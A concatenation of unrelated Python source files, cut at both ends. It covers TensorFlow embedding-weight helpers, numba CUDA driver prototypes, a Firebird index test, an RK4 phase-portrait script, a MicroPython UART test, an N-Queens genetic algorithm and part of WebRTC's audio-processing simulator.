collections=None, layer=None): r'''Creates the embedding lookup weight. Args: column: An `EmbeddingColumn` for building weight. name: Name of the embedding weights. shape: Shape of the embedding weights. dtype: (Optional.) Data type of the embedding weights. trainable: (Optional.) If True, the embedding weights can be trained. use_resource: (Optional.) If True, the embedding weights uses resource. initializer: (Optional.) Initializer of the embedding weights. collections: (Optional.) Collections of the embedding weights. layer: `DenseFeatures` layer which manages weights. Returns: The embedding weight. ''' @abc.abstractmethod def init_from_checkpoint( self, column, ckpt_dir_or_file, tensor_name_in_ckpt, to_restore): r'''Replaces initializers of embedding weights to load from checkpoints. Args: column: An `EmbeddingColumn`. ckpt_dir_or_file: Directory with checkpoints file or path to checkpoint or checkpoint file path. tensor_name_in_ckpt: Name of the `Tensor` in `ckpt_dir_or_file` from which to restore the column weights. Required if `ckpt_to_load_from` is not `None`. to_restore: `Tensor` to restore. ''' @abc.abstractmethod def lookup(self, column, weight, inputs, sharded=False, buffered=False): r'''Lookup for embedding vectors. Args: column: An `EmbeddingColumn`. weight: Embedding weight. inputs: Inputs for embedding lookup. sharded: If True inputs are sharded. buffered: If True initialization would be delayed. Returns: Embedding vectors from the weight. ''' @abc.abstractmethod def update(self, column, weight, indexed_updates): r'''Update embedding weight. Args: column: An `EmbeddingColumn`. weight: Embedding weight. indexed_updates: An `IndexedSlices` to update weight in specific indices. ''' def buffer_size(self): r'''Buffer size of embedding variables for training. ''' return Context.get().options.emb_buffer_size def buffer_load_factor(self): r'''Buffer load factor of embedding variables for training. ''' return Context.get().options.emb_buffer_load_factor def num_groups(self): r'''Number of embedding column groups for training. ''' return Context.get().options.emb_num_groups def enable_concat(self): r'''If True, concat embedding vectors for training. ''' return Context.get().options.emb_enable_concat def num_buckets(self, column): r'''Number of buckets for the column. ''' num_buckets = getattr( column.categorical_column, 'num_buckets', column.categorical_column._num_buckets) # pylint: disable=protected-access return num_buckets def dimension(self, column): r'''Dimension of the column. ''' return column.dimension @property def enable_sharding(self): r'''Whether the sharding is enabled. ''' return not mode_keys.is_predict(Context.get().options.mode) def sharded(self, column): r'''Whether the column should be sharded. ''' if Context.get().world_size <= 1: return False if not self.enable_sharding: return False batch_size = Context.get().options.batch_size if batch_size < 0 or self.num_buckets(column) is None: return True if batch_size < self.num_buckets(column): return True return False def unique(self, column): r'''Whether inputs for the column is already unique. ''' return Context.get().options.emb_unique[column.categorical_column.name] def device(self, column): r'''Device of the column weights. ''' return Context.get().options.emb_device[column.categorical_column.name] def input_device(self, column): r'''Device of embedding lookup inputs. ''' options = Context.get().options return options.emb_input_device[column.categorical_column.name] def dtype(self, column): r'''Data type of the column weights. ''' return Context.get().options.emb_dtype[column.categorical_column.name] def wire_dtype(self, column): r'''Data type of the column for communicaiton. ''' return Context.get().options.emb_wire_dtype[column.categorical_column.name] def input_dtype(self, column): r'''Data type of the column inputs. ''' return Context.get().options.emb_input_dtype[column.categorical_column.name] def segment_rank(self, column): r'''Segment rank of the column weights. ''' options = Context.get().options return options.emb_segment_rank[column.categorical_column.name] def weight_name(self, column): r'''Name of the column weights. ''' name = 'embedding_weights' if self.sharded(column): shard = Context.get().rank name = f'{name}/part_{shard}' return name def weight_shared_name(self, column, var): r'''Get shared name of the column weights from an variable. ''' var_name = var.name.split(':')[0] if self.sharded(column): return var_name.split('/part')[0] return var_name
from ctypes import * from numba.cuda.cudadrv import _extras cu_device = c_int cu_device_attribute = c_int # enum cu_context = c_void_p # an opaque handle cu_module = c_void_p # an opaque handle cu_jit_option = c_int # enum cu_jit_input_type = c_int # enum cu_function = c_void_p # an opaque handle cu_device_ptr = c_size_t # defined as unsigned int on 32-bit # and unsigned long long on 64-bit machine cu_stream = c_void_p # an opaque handle cu_event = c_void_p cu_link_state = c_void_p cu_function_attribute = c_int cu_ipc_mem_handle = (c_byte * _extras.CUDA_IPC_HANDLE_SIZE) # 64 bytes wide cu_stream_callback_pyobj = CFUNCTYPE(None, cu_stream, c_int, py_object) cu_occupancy_b2d_size = CFUNCTYPE(c_size_t, c_int) # See https://docs.nvidia.com/cuda/cuda-driver-api/group__CUDA__TYPES.html CU_STREAM_DEFAULT = 0 CU_STREAM_LEGACY = 1 CU_STREAM_PER_THREAD = 2 API_PROTOTYPES = { # CUresult cuInit(unsigned int Flags); 'cuInit' : (c_int, c_uint), # CUresult cuDriverGetVersion ( int* driverVersion ) 'cuDriverGetVersion': (c_int, POINTER(c_int)), # CUresult cuDeviceGetCount(int *count); 'cuDeviceGetCount': (c_int, POINTER(c_int)), # CUresult cuDeviceGet(CUdevice *device, int ordinal); 'cuDeviceGet': (c_int, POINTER(cu_device), c_int), # CUresult cuDeviceGetName ( char* name, int len, CUdevice dev ) 'cuDeviceGetName': (c_int, c_char_p, c_int, cu_device), # CUresult cuDeviceGetAttribute(int *pi, CUdevice_attribute attrib, # CUdevice dev); 'cuDeviceGetAttribute': (c_int, POINTER(c_int), cu_device_attribute, cu_device), # CUresult cuDeviceComputeCapability(int *major, int *minor, # CUdevice dev); 'cuDeviceComputeCapability': (c_int, POINTER(c_int), POINTER(c_int), cu_device), # CUresult cuDevicePrimaryCtxGetState ( CUdevice dev, unsigned int* flags, int* active ) 'cuDevicePrimaryCtxGetState': (c_int, cu_device, POINTER(c_uint), POINTER(c_int)), # CUresult cuDevicePrimaryCtxRelease ( CUdevice dev ) 'cuDevicePrimaryCtxRelease': (c_int, cu_device), # CUresult cuDevicePrimaryCtxReset ( CUdevice dev ) 'cuDevicePrimaryCtxReset': (c_int, cu_device), # CUresult cuDevicePrimaryCtxRetain ( CUcontext* pctx, CUdevice dev ) 'cuDevicePrimaryCtxRetain': (c_int, POINTER(cu_context), cu_device), # CUresult cuDevicePrimaryCtxSetFlags ( CUdevice dev, unsigned int flags ) 'cuDevicePrimaryCtxSetFlags': (c_int, cu_device, c_uint), # CUresult cuCtxCreate(CUcontext *pctx, unsigned int flags, # CUdevice dev); 'cuCtxCreate': (c_int, POINTER(cu_context), c_uint, cu_device), # CUresult cuCtxGetDevice ( CUdevice * device ) 'cuCtxGetDevice': (c_int, POINTER(cu_device)), # CUresult cuCtxGetCurrent (CUcontext *pctx); 'cuCtxGetCurrent': (c_int, POINTER(cu_context)), # CUresult cuCtxPushCurrent (CUcontext pctx); 'cuCtxPushCurrent': (c_int, cu_context), # CUresult cuCtxPopCurrent (CUcontext *pctx); 'cuCtxPopCurrent': (c_int, POINTER(cu_context)), # CUresult cuCtxDestroy(CUcontext pctx); 'cuCtxDestroy': (c_int, cu_context), # CUresult cuModuleLoadDataEx(CUmodule *module, const void *image, # unsigned int numOptions, # CUjit_option *options, # void **optionValues); 'cuModuleLoadDataEx': (c_int, cu_module, c_void_p, c_uint, POINTER(cu_jit_option), POINTER(c_void_p)), # CUresult cuModuleUnload(CUmodule hmod); 'cuModuleUnload': (c_int, cu_module), # CUresult cuModuleGetFunction(CUfunction *hfunc, CUmodule hmod, # const char *name); 'cuModuleGetFunction': (c_int, cu_function, cu_module, c_char_p), # CUresult cuModuleGetGlobal ( CUdeviceptr* dptr, size_t* bytes, CUmodule # hmod, const char* name ) 'cuModuleGetGlobal': (c_int, POINTER(cu_device_ptr), POINTER(c_size_t), cu_module, c_char_p), # CUresult CUDAAPI cuFuncSetCacheConfig(CUfunction hfunc, # CUfunc_cache config); 'cuFuncSetCacheConfig': (c_int, cu_function, c_uint), # CUresult cuMemAlloc(CUdeviceptr *dptr, size_t bytesize); 'cuMemAlloc': (c_int, POINTER(cu_device_ptr), c_size_t), # CUresult cuMemsetD8(CUdeviceptr dstDevice, unsigned char uc, size_t N) 'cuMemsetD8': (c_int, cu_device_ptr, c_uint8, c_size_t), # CUresult cuMemsetD8Async(CUdeviceptr dstDevice, unsigned char uc, # size_t N, CUstream hStream); 'cuMemsetD8Async': (c_int, cu_device_ptr, c_uint8, c_size_t, cu_stream), # CUresult cuMemcpyHtoD(CUdeviceptr dstDevice, const void *srcHost, # size_t ByteCount); 'cuMemcpyHtoD': (c_int, cu_device_ptr, c_void_p, c_size_t), # CUresult cuMemcpyHtoDAsync(CUdeviceptr dstDevice, const void *srcHost, # size_t ByteCount, CUstream hStream); 'cuMemcpyHtoDAsync': (c_int, cu_device_ptr, c_void_p, c_size_t, cu_stream), # CUresult cuMemcpyHtoD(CUdeviceptr dstDevice, const void *srcHost, # size_t ByteCount); 'cuMemcpyDtoD': (c_int, cu_device_ptr, cu_device_ptr, c_size_t), # CUresult cuMemcpyHtoDAsync(CUdeviceptr dstDevice, const void *srcHost, # size_t ByteCount, CUstream hStream); 'cuMemcpyDtoDAsync': (c_int, cu_device_ptr, cu_device_ptr, c_size_t, cu_stream), # CUresult cuMemcpyDtoH(void *dstHost, CUdeviceptr srcDevice, # size_t ByteCount); 'cuMemcpyDtoH': (c_int, c_void_p, cu_device_ptr, c_size_t), # CUresult cuMemcpyDtoHAsync(void *dstHost, CUdeviceptr srcDevice, # size_t ByteCount, CUstream hStream); 'cuMemcpyDtoHAsync': (c_int, c_void_p, cu_device_ptr, c_size_t, cu_stream), # CUresult cuMemFree(CUdeviceptr dptr); 'cuMemFree': (c_int, cu_device_ptr), # CUresult cuStreamCreate(CUstream *phStream, unsigned int Flags); 'cuStreamCreate': (c_int, POINTER(cu_stream), c_uint), # CUresult cuStreamDestroy(CUstream hStream); 'cuStreamDestroy': (c_int, cu_stream), # CUresult cuStreamSynchronize(CUstream hStream); 'cuStreamSynchronize': (c_int, cu_stream), # CUresult cuStreamAddCallback(CUstream hStream, CUstreamCallback callback, void* userData, unsigned int flags) 'cuStreamAddCallback': (c_int, cu_stream, cu_stream_callback_pyobj, py_object, c_uint), # CUresult cuLaunchKernel(CUfunction f, unsigned int gridDimX, # unsigned int gridDimY, # unsigned int gridDimZ, # unsigned int blockDimX, # unsigned int blockDimY, # unsigned int blockDimZ, # unsigned int sharedMemBytes, # CUstream hStream, void **kernelParams, # void ** extra) 'cuLaunchKernel': (c_int, cu_function, c_uint, c_uint, c_uint, c_uint, c_uint, c_uint, c_uint, cu_stream, POINTER(c_void_p), POINTER(c_void_p)), # CUresult cuMemHostAlloc ( void ** pp, # size_t bytesize, # unsigned int Flags # ) 'cuMemHostAlloc': (c_int, c_void_p, c_size_t, c_uint), # CUresult cuMemFreeHost ( void * p ) 'cuMemFreeHost': (c_int, c_void_p), # CUresult cuMemHostRegister(void * p, # size_t bytesize, # unsigned int Flags) 'cuMemHostRegister': (c_int, c_void_p, c_size_t, c_uint), # CUresult cuMemHostUnregister(void * p) 'cuMemHostUnregister': (c_int, c_void_p), # CUresult cuMemHostGetDevicePointer(CUdeviceptr * pdptr, # void * p, # unsigned int Flags) 'cuMemHostGetDevicePointer': (c_int, POINTER(cu_device_ptr), c_void_p, c_uint), # CUresult cuMemGetInfo(size_t * free, size_t * total) 'cuMemGetInfo' : (c_int, POINTER(c_size_t), POINTER(c_size_t)), # CUresult cuEventCreate ( CUevent * phEvent, # unsigned int Flags ) 'cuEventCreate': (c_int, POINTER(cu_event), c_uint), # CUresult cuEventDestroy ( CUevent hEvent ) 'cuEventDestroy': (c_int, cu_event), # CUresult cuEventElapsedTime ( float * pMilliseconds, # CUevent hStart, # CUevent hEnd ) 'cuEventElapsedTime': (c_int, POINTER(c_float), cu_event, cu_event), # CUresult cuEventQuery ( CUevent hEvent ) 'cuEventQuery': (c_int, cu_event), # CUresult cuEventRecord ( CUevent hEvent, # CUstream hStream ) 'cuEventRecord': (c_int, cu_event, cu_stream), # CUresult cuEventSynchronize ( CUevent hEvent ) 'cuEventSynchronize': (c_int, cu_event), # CUresult cuStreamWaitEvent ( CUstream hStream, # CUevent hEvent, # unsigned int Flags ) 'cuStreamWaitEvent': (c_int, cu_stream, cu_event, c_uint), # CUresult cuPointerGetAttribute (void *data, CUpointer_attribute attribute, CUdeviceptr ptr) 'cuPointerGetAttribute': (c_int, c_void_p, c_uint, cu_device_ptr), # CUresult cuMemGetAddressRange ( CUdeviceptr * pbase, # size_t * psize, # CUdeviceptr dptr # ) 'cuMemGetAddressRange': (c_int, POINTER(cu_device_ptr), POINTER(c_size_t), cu_device_ptr), # CUresult cuMemHostGetFlags ( unsigned int * pFlags, # void * p ) 'cuMemHostGetFlags': (c_int, POINTER(c_uint), c_void_p), # CUresult cuCtxSynchronize ( void ) 'cuCtxSynchronize' : (c_int,), # CUresult # cuLinkCreate(unsigned int numOptions, CUjit_option *options, # void **optionValues, CUlinkState *stateOut); 'cuLinkCreate': (c_int, c_uint, POINTER(cu_jit_option), POINTER(c_void_p), POINTER(cu_link_state)), # CUresult # cuLinkAddData(CUlinkState state, CUjitInputType type, void *data, # size_t size, const char *name, unsigned # int numOptions, CUjit_option *options, # void **optionValues); 'cuLinkAddData': (c_int, cu_link_state, cu_jit_input_type, c_void_p, c_size_t, c_char_p, c_uint, POINTER(cu_jit_option), POINTER(c_void_p)), # CUresult # cuLinkAddFile(CUlinkState state, CUjitInputType type, # const char *path, unsigned int numOptions, # CUjit_option *options, void **optionValues); 'cuLinkAddFile': (c_int, cu_link_state, cu_jit_input_type, c_char_p, c_uint, POINTER(cu_jit_option), POINTER(c_void_p)), # CUresult CUDAAPI # cuLinkComplete(CUlinkState state, void **cubinOut, size_t *sizeOut) 'cuLinkComplete': (c_int, cu_link_state, POINTER(c_void_p), POINTER(c_size_t)), # CUresult CUDAAPI # cuLinkDestroy(CUlinkState state) 'cuLinkDestroy': (c_int, cu_link_state), # cuProfilerInitialize ( const char* configFile, const char* # outputFile, CUoutput_mode outputMode ) # 'cuProfilerInitialize': (c_int, c_char_p, c_char_p, cu_output_mode), # cuProfilerStart ( void ) 'cuProfilerStart': (c_int,), # cuProfilerStop ( void ) 'cuProfilerStop': (c_int,), # CUresult cuFuncGetAttribute ( int* pi, CUfunction_attribute attrib, # CUfunction hfunc ) 'cuFuncGetAttribute': (c_int, POINTER(c_int), cu_function_attribute, cu_function), # CUresult CUDAAPI cuOccupancyMaxActiveBlocksPerMultiprocessor(int *numBlocks, # CUfunction func, # int blockSize, # size_t dynamicSMemSize); 'cuOccupancyMaxActiveBlocksPerMultiprocessor': (c_int, POINTER(c_int), cu_function, c_size_t, c_uint), # CUresult CUDAAPI cuOccupancyMaxActiveBlocksPerMultiprocessorWithFlags(int *numBlocks, # CUfunction func, # int blockSize, # size_t dynamicSMemSize, # unsigned int flags); 'cuOccupancyMaxActiveBlocksPerMultiprocessor': (c_int, POINTER(c_int), cu_function, c_size_t, c_uint), # CUresult CUDAAPI cuOccupancyMaxPotentialBlockSize(int *minGridSize, int *blockSize, # CUfunction func, CUoccupancyB2DSize blockSizeToDynamicSMemSize, # size_t dynamicSMemSize, int blockSizeLimit); 'cuOccupancyMaxPotentialBlockSize': (c_int, POINTER(c_int), POINTER(c_int), cu_function, cu_occupancy_b2d_size, c_size_t, c_int), # CUresult CUDAAPI cuOccupancyMaxPotentialBlockSizeWithFlags(int *minGridSize, int *blockSize, # CUfunction func, CUoccupancyB2DSize blockSizeToDynamicSMemSize, # size_t dynamicSMemSize, int blockSizeLimit, unsigned int flags); 'cuOccupancyMaxPotentialBlockSizeWithFlags': (c_int, POINTER(c_int), POINTER(c_int), cu_function, cu_occupancy_b2d_size, c_size_t, c_int, c_uint), # CUresult cuIpcGetMemHandle ( CUipcMemHandle* pHandle, CUdeviceptr dptr ) 'cuIpcGetMemHandle': (c_int, POINTER(cu_ipc_mem_handle), cu_device_ptr), # CUresult cuIpcOpenMemHandle ( CUdeviceptr* pdptr, CUipcMemHandle handle, unsigned int Flags ) 'cuIpcOpenMemHandle': (c_int, POINTER(cu_device_ptr), cu_ipc_mem_handle, c_uint), # CUresult cuIpcCloseMemHandle ( CUdeviceptr dptr ) 'cuIpcCloseMemHandle': (c_int, cu_device_ptr), # CUresult cuCtxEnablePeerAccess ( CUcontext peerContext, unsigned int Flags ) 'cuCtxEnablePeerAccess': (c_int, cu_context, c_int), # CUresult cuDeviceCanAccessPeer ( int* canAccessPeer, # CUdevice dev, CUdevice peerDev ) 'cuDeviceCanAccessPeer': (c_int, POINTER(c_int), cu_device, cu_device), }
#coding:utf-8 # # id: functional.arno.indices.upper_bound_asc_01_segments_02 # title: ASC single index upper bound # decription: Check if all 32 values are fetched with "lower than" operator. # tracker_id: # min_versions: [] # versions: 1.5 # qmid: functional.arno.indexes.upper_bound_asc_01_segments_02 import pytest from firebird.qa import db_factory, isql_act, Action # version: 1.5 # resources: None substitutions_1 = [] init_script_1 = """CREATE TABLE Table_66 ( ID INTEGER ); SET TERM ^^ ; CREATE PROCEDURE PR_FillTable_66 AS DECLARE VARIABLE FillID INTEGER; BEGIN FillID = 2147483647; WHILE (FillID > 0) DO BEGIN INSERT INTO Table_66 (ID) VALUES (:FillID); FillID = FillID / 2; END INSERT INTO Table_66 (ID) VALUES (NULL); INSERT INTO Table_66 (ID) VALUES (0); INSERT INTO Table_66 (ID) VALUES (NULL); FillID = -2147483648; WHILE (FillID < 0) DO BEGIN INSERT INTO Table_66 (ID) VALUES (:FillID); FillID = FillID / 2; END END ^^ SET TERM ; ^^ COMMIT; EXECUTE PROCEDURE PR_FillTable_66; COMMIT; CREATE ASC INDEX I_Table_66_ASC ON Table_66 (ID); COMMIT; """ db_1 = db_factory(sql_dialect=3, init=init_script_1) test_script_1 = """SET PLAN ON; SELECT ID FROM Table_66 t66 WHERE t66.ID < 0;""" act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1) expected_stdout_1 = """PLAN (T66 INDEX (I_TABLE_66_ASC)) ID ============ -2147483648 -1073741824 -536870912 -268435456 -134217728 -67108864 -33554432 -16777216 -8388608 -4194304 -2097152 -1048576 -524288 -262144 -131072 -65536 -32768 -16384 -8192 -4096 ID ============ -2048 -1024 -512 -256 -128 -64 -32 -16 -8 -4 -2 -1""" @pytest.mark.version('>=1.5') def test_1(act_1: Action): act_1.expected_stdout = expected_stdout_1 act_1.execute() assert act_1.clean_stdout == act_1.clean_expected_stdout
#!/usr/bin/env python """ Here we draw the 2-D phase portrait of the equations """ import numpy as np import matplotlib.pyplot as plt from runge_kutta4 import rk4 def x_dot(t, x): return x[1] def u_dot(t, x): gamma1 = 0.1 a1 = 3 b1 = 2.2 epsilon1 = 17.09 omega1 = 2 * np.pi c1 = 2.2 Omega = 15 return -(gamma1 + a1 * x[0] ** 2 + b1 * x[2] ** 2) * x[1]\ - omega1 ** 2 * (1 + epsilon1 * np.sin(2 * Omega * t)) * x[0]\ - c1 * x[2] ** 2 * np.sin(Omega * t) def y_dot(t, x): return x[3] def v_dot(t, x): gamma2 = 0.1 epsilon2 = 2.99 omega2 = 2 * np.pi d2 = 10 a2 = 9.8 b2 = 2.2 Omega = 15 return -(gamma2 + a2 * x[2] ** 2 + b2 * x[0] ** 2) * x[3]\ -omega2 ** 2 * (1 + epsilon2 * np.sin(2 * Omega * t)) * x[2]\ - d2 * x[1] def main(): """ main body """ dots = [x_dot, u_dot, y_dot, v_dot] x_init = [0.1, 0, 0.1, 0] step = 0.005 end = 50 time, data = rk4(x_init, dots, step, end) # plot y(t) plt.plot(time, data[2], lw=1, label='x(t)') plt.legend() plt.savefig('yplot.jpg', dpi=200, bbox_inches='tight') plt.show() # plot phase portrait for (x, u) plt.plot(data[0], data[1], lw=1, label='u(x)') plt.xlabel('x') plt.ylabel('u') plt.legend() plt.title('phase portrait u(x)') plt.savefig('portrait_xu.jpg', dpi=200, bbox_inches='tight') plt.show() # plot phase portrait for (y, v) plt.plot(data[2], data[3], lw=1, label='v(y)') plt.xlabel('y') plt.ylabel('v') plt.legend() plt.title('phase portrait u(x)') plt.savefig('portrait_yv.jpg', dpi=200, bbox_inches='tight') plt.show() if __name__ == "__main__": main()
''' P11 and P12 must be connected together for this test to pass. ''' from machine import UART from machine import Pin import os import time # do not execute this test on the GPy and FiPy if os.uname().sysname == 'GPy' or os.uname().sysname == 'FiPy': print("SKIP") import sys sys.exit() uart = UART(2, 115200) print(uart) uart.init(57600, 8, None, 1, pins=('P11', 'P12')) uart.init(baudrate=9600, stop=2, parity=UART.EVEN, pins=('P11', 'P12')) uart.init(baudrate=115200, parity=UART.ODD, stop=1, pins=('P11', 'P12')) uart.read() print (uart.read()) print (uart.readline()) buff = bytearray(1) print (uart.readinto(buff, 1)) print (uart.read()) print (uart.any()) print (uart.write('a')) uart.deinit() uart = UART(2, 1000000, pins=('P12', 'P11')) print(uart) uart.read() print(uart.write(b'123456') == 6) print(uart.read() == b'123456') uart.deinit() uart = UART(2, 1000000, pins=('P11', 'P12')) print(uart) uart.read() print(uart.write(b'123456') == 6) print(uart.read() == b'123456') uart.deinit() uart = UART(2, 1000000, pins=('P11', 'P12')) print(uart.write(b'123') == 3) print(uart.read(1) == b'1') print(uart.read(2) == b'23') print(uart.read() == None) uart.write(b'123') buf = bytearray(3) print(uart.readinto(buf, 1) == 1) print(buf) print(uart.readinto(buf) == 2) print(buf) uart.deinit() # check for memory leaks... for i in range (0, 1000): uart = UART(2, 1000000) uart.deinit() # next ones must raise try: UART(2, 9600, parity=None, pins=('GP12', 'GP13', 'GP7')) except Exception: print('Exception') try: UART(2, 9600, parity=UART.ODD, pins=('GP12', 'GP7')) except Exception: print('Exception') # buffer overflow uart = UART(2, 1000000, pins=('P11', 'P12')) buf = bytearray([0x55AA] * 567) for i in range(200): r = uart.write(buf) r = uart.read() r = uart.read() print(r) print(uart.write(b'123456') == 6) print(uart.read() == b'123456') uart.deinit()
# Copyright (C) 2019 "Daniel Bramblett" <daniel.r.bramblett@gmail.com> import numpy as np import random from board_state import BoardState # The instance that is the genetic algorithm which manages the population each generation and performs the crossover # and mutation operation. class GeneticAlgorithm: # The size of the population each generation. population_size = 0 # The number of rows of the N-Queens problem. Note that this also the number of of columns. number_of_rows = 8 # The list of the average fitness score for each generation. average_fitness_per_generation = list() # The list containing each member of the population. population = None # The list containing the new members generated during the current generation. new_population = None # The weight of the mutation rate used to weight the random pick. weights = None # The number of members checked for the tournament selection. tournament_size = 4 # Initializes the fields in the class using the default or passed-in parameters. The initial population is then # randomly generated. def __init__(self, pop_size=100, mutation_rate=0.01, row_numb=8, tournament_size=4): self.population_size = pop_size self.number_of_rows = row_numb self.weights = [1 - mutation_rate, mutation_rate] self.generation_samples = list() self.tournament_size = tournament_size self.population = [BoardState(number_of_rows=self.number_of_rows) for _ in range(self.population_size)] self.population.sort(reverse=True) # Mutation operator that takes two indexes in the permutation and swaps them. def __mutation_operator__(self, child): swap_targets = random.sample(range(self.number_of_rows), 2) temp = child.state[swap_targets[0]] child.state[swap_targets[0]] = child.state[swap_targets[1]] child.state[swap_targets[1]] = temp # This function takes a state for the children. It then randomly decides if the child gets mutated or not. If the # child is going to be mutated, the child is initialized and passed into the mutation operator to perform the # mutation. Otherwise, the child is initialized and added to the new population without being mutated. def __consider_mutate__(self, child_state): if random.choices([0, 1], self.weights, k=1)[0]: child = BoardState(child_state) self.__mutation_operator__(child) self.new_population.append(child) else: self.new_population.append(BoardState(child_state)) # Crossover operator that generates two new children using two parents from the current generation. def __crossover_operator__(self, parent_a, parent_b): first_child_state = parent_a.state.copy() second_child_state = parent_b.state.copy() indices_used = list() for current_index in range(self.number_of_rows): if current_index in indices_used: break if first_child_state[current_index] == second_child_state[current_index]: indices_used.append(current_index) break index_order = list() value_order = list() index_order.append(current_index) value_order.append(first_child_state[current_index]) search_value = second_child_state[current_index] while search_value != value_order[0]: found = np.where(first_child_state == search_value)[0][0] index_order.append(found) value_order.append(search_value) search_value = second_child_state[found] for current in range(len(index_order) - 1): first_child_state[index_order[current + 1]] = second_child_state[index_order[current - 1]] = value_order[current] first_child_state[index_order[0]] = value_order[-1] second_child_state[index_order[len(index_order) - 2]] = value_order[-1] while len(index_order) > 0: indices_used.append(index_order.pop(0)) self.__consider_mutate__(first_child_state) self.__consider_mutate__(second_child_state) # Uses tournament selection to select a member of the population as a parent. def __select_parent__(self): return self.population[min(random.sample(range(self.population_size), self.tournament_size))] # Uses the current generation to generate the next generation. def generate_next_generation(self): self.new_population = list() while len(self.new_population) < self.population_size: self.__crossover_operator__(self.__select_parent__(), self.__select_parent__()) if len(self.new_population) > self.population_size: self.new_population.pop() self.population = self.new_population self.population.sort(reverse=True) # Current generation statistics. def generation_statistics(self): average_fitness = 0 max_fitness = 0 # Goes through each member of the population and calculates the average fitness while keeping track of the # highest fitness score observed. for current_member in self.population: average_fitness += current_member.fitness_value if current_member.fitness_value > max_fitness: max_fitness = current_member.fitness_value return average_fitness / self.population_size, max_fitness # This function finds the member of the population with the highest fitness score and returns it. def top_member(self): # Initially assumes that the first member of the population has the highest fitness score and saves its index # and fitness score. current_top_fitness = self.population[0].fitness_value current_top_index = list() current_top_index.append(0) # Goes through each member of the population and checks there fitness score against the current top. If it's # higher, the current member becomes the new top member and the fitness score and list of top indexes is # updated. # If the fitness score is equal to the top fitness score, the index is saved as a tie for the top fitness score. for current_member in range(1, self.population_size): if current_top_fitness < self.population[current_member].fitness_value: current_top_index.clear() current_top_index.append(current_member) current_top_fitness = self.population[current_member].fitness_value elif current_top_fitness == self.population[current_member].fitness_value: current_top_index.append(current_member) # From the list of top fitness score members, one is randomly chosen to be returned as a reference. return self.population[random.choice(current_top_index)]
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved. # # Use of this source code is governed by a BSD-style license # that can be found in the LICENSE file in the root of the source # tree. An additional intellectual property rights grant can be found # in the file PATENTS. All contributing project authors may # be found in the AUTHORS file in the root of the source tree. """APM module simulator. """ import logging import os from . import annotations from . import data_access from . import echo_path_simulation from . import echo_path_simulation_factory from . import eval_scores from . import exceptions from . import input_mixer from . import input_signal_creator from . import signal_processing from . import test_data_generation class ApmModuleSimulator(object): """Audio processing module (APM) simulator class. """ _TEST_DATA_GENERATOR_CLASSES = ( test_data_generation.TestDataGenerator.REGISTERED_CLASSES) _EVAL_SCORE_WORKER_CLASSES = eval_scores.EvaluationScore.REGISTERED_CLASSES _PREFIX_APM_CONFIG = 'apmcfg-' _PREFIX_CAPTURE = 'capture-' _PREFIX_RENDER = 'render-' _PREFIX_ECHO_SIMULATOR = 'echosim-' _PREFIX_TEST_DATA_GEN = 'datagen-' _PREFIX_TEST_DATA_GEN_PARAMS = 'datagen_params-' _PREFIX_SCORE = 'score-' def __init__(self, test_data_generator_factory, evaluation_score_factory, ap_wrapper, evaluator, external_vads=None): if external_vads is None: external_vads = {} self._test_data_generator_factory = test_data_generator_factory self._evaluation_score_factory = evaluation_score_factory self._audioproc_wrapper = ap_wrapper self._evaluator = evaluator self._annotator = annotations.AudioAnnotationsExtractor( annotations.AudioAnnotationsExtractor.VadType.ENERGY_THRESHOLD | annotations.AudioAnnotationsExtractor.VadType.WEBRTC_COMMON_AUDIO | annotations.AudioAnnotationsExtractor.VadType.WEBRTC_APM, external_vads ) # Init. self._test_data_generator_factory.SetOutputDirectoryPrefix( self._PREFIX_TEST_DATA_GEN_PARAMS) self._evaluation_score_factory.SetScoreFilenamePrefix( self._PREFIX_SCORE) # Properties for each run. self._base_output_path = None self._output_cache_path = None self._test_data_generators = None self._evaluation_score_workers = None self._config_filepaths = None self._capture_input_filepaths = None self._render_input_filepaths = None self._echo_path_simulator_class = None @classmethod def GetPrefixApmConfig(cls): return cls._PREFIX_APM_CONFIG @classmethod def GetPrefixCapture(cls): return cls._PREFIX_CAPTURE @classmethod def GetPrefixRender(cls): return cls._PREFIX_RENDER @classmethod def GetPrefixEchoSimulator(cls): return cls._PREFIX_ECHO_SIMULATOR @classmethod def GetPrefixTestDataGenerator(cls): return cls._PREFIX_TEST_DATA_GEN @classmethod def GetPrefixTestDataGeneratorParameters(cls): return cls._PREFIX_TEST_DATA_GEN_PARAMS @classmethod def GetPrefixScore(cls): return cls._PREFIX_SCORE def Run(self, config_filepaths, capture_input_filepaths, test_data_generator_names, eval_score_names, output_dir, render_input_filepaths=None, echo_path_simulator_name=( echo_path_simulation.NoEchoPathSimulator.NAME)): """Runs the APM simulation. Initializes paths and required instances, then runs all the simulations. The render input can be optionally added. If added, the number of capture input audio tracks and the number of render input audio tracks have to be equal. The two lists are used to form pairs of capture and render input. Args: config_filepaths: set of APM configuration files to test. capture_input_filepaths: set of capture input audio track files to test. test_data_generator_names: set of test data generator names to test. eval_score_names: set of evaluation score names to test. output_dir: base path to the output directory for wav files and outcomes. render_input_filepaths: set of render input audio track files to test. echo_path_simulator_name: name of the echo path simulator to use when render input is provided. """ assert render_input_filepaths is None or ( len(capture_input_filepaths) == len(render_input_filepaths)), ( 'render input set size not matching input set size') assert render_input_filepaths is None or echo_path_simulator_name in ( echo_path_simulation.EchoPathSimulator.REGISTERED_CLASSES), ( 'invalid echo path simulator') self._base_output_path = os.path.abspath(output_dir) # Output path used to cache the data shared across simulations. self._output_cache_path = os.path.join(self._base_output_path, '_cache') # Instance test data generators. self._test_data_generators = [self._test_data_generator_factory.GetInstance( test_data_generators_class=( self._TEST_DATA_GENERATOR_CLASSES[name])) for name in ( test_data_generator_names)] # Instance evaluation score workers. self._evaluation_score_workers = [ self._evaluation_score_factory.GetInstance( evaluation_score_class=self._EVAL_SCORE_WORKER_CLASSES[name]) for ( name) in eval_score_names] # Set APM configuration file paths. self._config_filepaths = self._CreatePathsCollection(config_filepaths) # Set probing signal file paths. if render_input_filepaths is None: # Capture input only. self._capture_input_filepaths = self._CreatePathsCollection( capture_input_filepaths) self._render_input_filepaths = None else: # Set both capture and render input signals. self._SetTestInputSignalFilePaths( capture_input_filepaths, render_input_filepaths) # Set the echo path simulator class. self._echo_path_simulator_class = ( echo_path_simulation.EchoPathSimulator.REGISTERED_CLASSES[ echo_path_simulator_name]) self._SimulateAll() def _SimulateAll(self): """Runs all the simulations. Iterates over the combinations of APM configurations, probing signals, and test data generators. This method is mainly responsible for the creation of the cache and output directories required in order to call _Simulate(). """ without_render_input = 